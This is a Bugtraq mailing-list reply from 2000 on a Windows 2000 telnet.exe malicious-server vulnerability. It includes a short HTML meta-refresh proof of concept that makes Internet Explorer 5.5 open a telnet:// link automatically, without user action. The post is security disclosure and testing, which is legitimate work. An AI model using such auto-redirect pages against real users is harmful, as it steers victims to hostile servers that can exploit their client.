[16768] in bugtraq
Re: Win2k Telnet.exe malicious server vulnerability
daemon@ATHENA.MIT.EDU (Micah Webner)
Thu Sep 14 13:04:31 2000
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-Id: <014a01c01e58$e48bdae0$0103000a@hfcc>
Date: Thu, 14 Sep 2000 10:34:30 -0400
Reply-To: Micah Webner <micah@SYSTIME.COM>
From: Micah Webner <micah@SYSTIME.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
----- Original Message -----
From: "monti" <monti@USHOST.COM>
To: <BUGTRAQ@SECURITYFOCUS.COM>
Sent: Wednesday, September 13, 2000 4:13 PM
Subject: Win2k Telnet.exe malicious server vulnerability
> I would speculate that it might also be possible to force this to
> happen without user intervention with javascript/activeX/java or
really
> creative HTLM. I try really hard not to do HTLM/web-code anymore
unless
> it's really necessary so I didnt test this.
I tested this with IE5.5 and a simple http refresh, and it opened a
telnet window.
<html><head>
<meta http-equiv="refresh"
content="0;URL=telnet://sometelnetserver">
</head>
</html>
Didn't even need jscript/ActiveX/java to pull it off.
Micah
